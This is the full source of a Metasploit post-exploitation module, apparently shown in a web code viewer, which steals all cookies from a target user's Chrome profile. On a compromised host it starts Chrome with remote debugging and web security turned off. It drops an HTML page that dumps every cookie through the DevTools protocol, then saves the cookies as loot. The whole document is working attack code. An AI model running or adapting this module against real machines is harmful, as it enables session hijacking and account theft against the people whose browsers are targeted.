Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Chrome Gather Cookies',
14
        'Description' => 'Read all cookies from the Default Chrome profile of the target user.',
15
        'License' => MSF_LICENSE,
16
        'Author' => ['mangopdf <mangodotpdf[at]gmail.com>'],
17
        'Platform' => %w[linux unix bsd osx windows],
18
        'SessionTypes' => %w[meterpreter shell]
19
      )
20
    )
21

22
    register_options(
23
      [
24
        OptString.new('CHROME_BINARY_PATH', [false, "The path to the user's Chrome binary (leave blank to use the default for the OS)", '']),
25
        OptString.new('WRITEABLE_DIR', [false, 'Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\\Local\\Temp)', '']),
26
        OptInt.new('REMOTE_DEBUGGING_PORT', [false, 'Port on target machine to use for remote debugging protocol', 9222])
27
      ]
28
    )
29
  end
30

31
  def configure_for_platform
32
    vprint_status('Determining session platform')
33
    vprint_status("Platform: #{session.platform}")
34
    vprint_status("Type: #{session.type}")
35

36
    if session.platform == 'windows'
37
      username = get_env('USERNAME').strip
38
    else
39
      username = cmd_exec 'id -un'
40
    end
41

42
    temp_storage_dir = datastore['WRITABLE_DIR']
43

44
    case session.platform
45
    when 'unix', 'linux', 'bsd', 'python'
46
      chrome = 'google-chrome'
47
      user_data_dir = "/home/#{username}/.config/google-chrome"
48
      temp_storage_dir = temp_storage_dir.nil? ? '/tmp' : temp_storage_dir
49
      @cookie_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}"
50
    when 'osx'
51
      chrome = '"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"'
52
      user_data_dir = expand_path "/Users/#{username}/Library/Application Support/Google/Chrome"
53
      temp_storage_dir = temp_storage_dir.nil? ? '/tmp' : temp_storage_dir
54
      @cookie_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}"
55
    when 'windows'
56
      chrome = '"\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"'
57
      user_data_dir = "\\Users\\#{username}\\AppData\\Local\\Google\\Chrome\\User Data"
58
      temp_storage_dir = temp_storage_dir.nil? ? "\\Users\\#{username}\\AppData\\Local\\Temp" : temp_storage_dir
59
      @cookie_storage_path = "#{user_data_dir}\\chrome_debug.log"
60
    else
61
      fail_with Failure::NoTarget, "Unsupported platform: #{session.platform}"
62
    end
63

64
    unless datastore['CHROME_BINARY_PATH'].empty?
65
      chrome = datastore['CHROME_BINARY_PATH']
66
    end
67

68
=begin
69
    # #writable? not supported on windows
70
    unless writable? @temp_storage_dir
71
      fail_with Failure::BadConfig, "#{@temp_storage_dir} is not writable"
72
    end
73
=end
74

75
    @html_storage_path = create_cookie_stealing_html(temp_storage_dir)
76

77
    chrome_debugging_args = []
78

79
    if session.platform == 'windows'
80
      # `--headless` doesn't work on Windows, so use an offscreen window instead.
81
      chrome_debugging_args << '--window-position=0,0'
82
      chrome_debugging_args << '--enable-logging --v=1'
83
    else
84
      chrome_debugging_args << '--headless'
85
    end
86

87
    chrome_debugging_args_all_platforms = [
88
      '--disable-translate',
89
      '--disable-extensions',
90
      '--disable-background-networking',
91
      '--safebrowsing-disable-auto-update',
92
      '--disable-sync',
93
      '--metrics-recording-only',
94
      '--disable-default-apps',
95
      '--mute-audio',
96
      '--no-first-run',
97
      '--disable-web-security',
98
      '--disable-plugins',
99
      '--disable-gpu'
100
    ]
101

102
    chrome_debugging_args << chrome_debugging_args_all_platforms
103
    chrome_debugging_args << " --user-data-dir=\"#{user_data_dir}\""
104
    chrome_debugging_args << " --remote-debugging-port=#{datastore['REMOTE_DEBUGGING_PORT']}"
105
    chrome_debugging_args << " #{@html_storage_path}"
106

107
    @chrome_debugging_cmd = "#{chrome} #{chrome_debugging_args.join(' ')}"
108
  end
109

110
  def create_cookie_stealing_html(temp_storage_dir)
111
    cookie_stealing_html = %(
112
      <!DOCTYPE html>
113
      <html lang="en">
114
      <head>
115
        <meta charset="utf-8">
116
        <title>index.html</title>
117
      </head>
118
      <body>
119
          <script>
120

121
              var remoteDebuggingPort = #{datastore['REMOTE_DEBUGGING_PORT']};
122
              var request = new XMLHttpRequest();
123
              request.open("GET", "http://localhost:" + remoteDebuggingPort + "/json");
124
              request.responseType = 'json';
125
              request.send();
126

127
              request.onload = function() {
128
                var webSocketDebuggerUrl = request.response[0].webSocketDebuggerUrl;
129
                console.log(webSocketDebuggerUrl);
130
                var connection = new WebSocket(webSocketDebuggerUrl);
131

132
                connection.onopen = function () {
133
                  connection.send('{"id": 1, "method": "Network.getAllCookies"}');
134
                };
135

136
                connection.onmessage = function (e) {
137
                  var cookies_blob = JSON.stringify(JSON.parse(e.data).result.cookies);
138
                  console.log('REMOTE_DEBUGGING|' + cookies_blob);
139
                };
140
              }
141
          </script>
142
      </body>
143
      </html>
144
    )
145

146
    # Where to temporarily store the cookie-stealing html
147
    if session.platform == 'windows'
148
      html_storage_path = "#{temp_storage_dir}\\#{Rex::Text.rand_text_alphanumeric(10..15)}.html"
149
    else
150
      html_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}.html"
151
    end
152

153
    write_file(html_storage_path, cookie_stealing_html)
154
    html_storage_path
155
  end
156

157
  def cleanup
158
    if file?(@html_storage_path)
159
      vprint_status("Removing file #{@html_storage_path}")
160
      rm_f @html_storage_path
161
    end
162

163
    if file?(@cookie_storage_path)
164
      vprint_status("Removing file #{@cookie_storage_path}")
165
      rm_f @cookie_storage_path
166
    end
167
  end
168

169
  def get_cookies
170
    if session.platform == 'windows'
171
      chrome_cmd = @chrome_debugging_cmd.to_s
172
      kill_cmd = 'taskkill /f /pid'
173
    else
174
      chrome_cmd = "#{@chrome_debugging_cmd} > #{@cookie_storage_path} 2>&1"
175
      kill_cmd = 'kill -9'
176
    end
177

178
    if session.type == 'meterpreter'
179
      chrome_pid = cmd_exec_get_pid(chrome_cmd)
180
      print_status "Activated Chrome's Remote Debugging (pid: #{chrome_pid}) via #{chrome_cmd}"
181
      Rex.sleep(5)
182

183
      # read_file within if/else block because kill was terminating sessions on OSX during testing
184
      chrome_output = read_file(@cookie_storage_path)
185

186
      # Kills spawned chrome process in windows meterpreter sessions.
187
      # In OSX and Linux the meterpreter sessions would stop as well.
188
      if session.platform == 'windows'
189
        kill_output = cmd_exec "#{kill_cmd} #{chrome_pid}"
190
      end
191
    else
192
      # Using shell_command for backgrounding process (&)
193
      client.shell_command("#{chrome_cmd} &")
194
      print_status "Activated Chrome's Remote Debugging via #{chrome_cmd}"
195
      Rex.sleep(5)
196

197
      chrome_output = read_file(@cookie_storage_path)
198
    end
199

200
    cookies_msg = ''
201
    chrome_output.each_line do |line|
202
      if line =~ /REMOTE_DEBUGGING/
203
        print_good('Found Match')
204
        cookies_msg = line
205
      end
206
    end
207

208
    fail_with(Failure::Unknown, 'Failed to retrieve cookie data') if cookies_msg.empty?
209

210
    # Slice off the "REMOTE_DEBUGGING|" delimiter and trailing source info
211
    cookies_json = cookies_msg.split('REMOTE_DEBUGGING|')[1]
212
    cookies_json.split('", source: file')[0]
213
  end
214

215
  def save(msg, data, ctype = 'text/json')
216
    ltype = 'chrome.gather.cookies'
217
    loot = store_loot ltype, ctype, session, data, nil, msg
218
    print_good "#{msg} stored in #{loot}"
219
  end
220

221
  def run
222
    fail_with Failure::BadConfig, 'No session found, giving up' if session.nil?
223

224
    # Issues with write_file. Maybe a path problem?
225
    if session.platform == 'windows' && session.type == 'shell'
226
      fail_with Failure::BadConfig, 'Windows shell session not support, giving up'
227
    end
228

229
    unless session.platform == 'windows' && session.type == 'meterpreter'
230
      print_warning 'This module will leave a headless Chrome process running on the target machine.'
231
    end
232

233
    configure_for_platform
234
    cookies = get_cookies
235
    cookies_parsed = JSON.parse cookies
236
    save "#{cookies_parsed.length} Chrome Cookies", cookies
237
  end
238
end
239

240